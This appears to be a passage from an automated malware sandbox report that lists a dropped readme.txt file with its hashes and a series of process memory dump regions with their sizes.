                      • C:\Users\Admin\readme.txt

                        Filesize

                        780B

                        MD5

                        60d646f40556d78166ad8111d850fc51

                        SHA1

                        babaaf0762000dbf4b3f7a93beb35b6d9279d94d

                        SHA256

                        a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab

                        SHA512

                        3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

                      • memory/1972-62-0x00000000050C0000-0x0000000005282000-memory.dmp

                        Filesize

                        1.8MB

                      • memory/1972-126-0x00000000076D0000-0x0000000007C76000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/1972-68-0x0000000006C40000-0x0000000006CD2000-memory.dmp

                        Filesize

                        584KB

                      • memory/1972-67-0x00000000068F0000-0x0000000006956000-memory.dmp

                        Filesize

                        408KB

                      • memory/1972-66-0x0000000006050000-0x000000000657C000-memory.dmp

                        Filesize

                        5.2MB

                      • memory/1972-61-0x0000000004ED0000-0x0000000004EE2000-memory.dmp

                        Filesize

                        72KB

                      • memory/1972-60-0x00000000004A0000-0x00000000004DC000-memory.dmp

                        Filesize

                        240KB

                      • memory/3268-47-0x0000000000760000-0x0000000000788000-memory.dmp

                        Filesize

                        160KB

                      • memory/4676-12-0x0000028E6B270000-0x0000028E6B292000-memory.dmp

                        Filesize

                        136KB

                      • memory/4676-13-0x00007FFF3E830000-0x00007FFF3F2F2000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4676-14-0x00007FFF3E830000-0x00007FFF3F2F2000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4676-3-0x00007FFF3E833000-0x00007FFF3E835000-memory.dmp

                        Filesize

                        8KB

                      • memory/4676-15-0x00007FFF3E830000-0x00007FFF3F2F2000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4676-18-0x00007FFF3E830000-0x00007FFF3F2F2000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4676-19-0x00007FFF3E830000-0x00007FFF3F2F2000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4732-0-0x0000000140000000-0x0000000140028000-memory.dmp

                        Filesize

                        160KB

                      • memory/4732-65-0x0000000140000000-0x0000000140028000-memory.dmp

                        Filesize

                        160KB

                      • memory/4732-41-0x0000000140000000-0x0000000140028000-memory.dmp

                        Filesize

                        160KB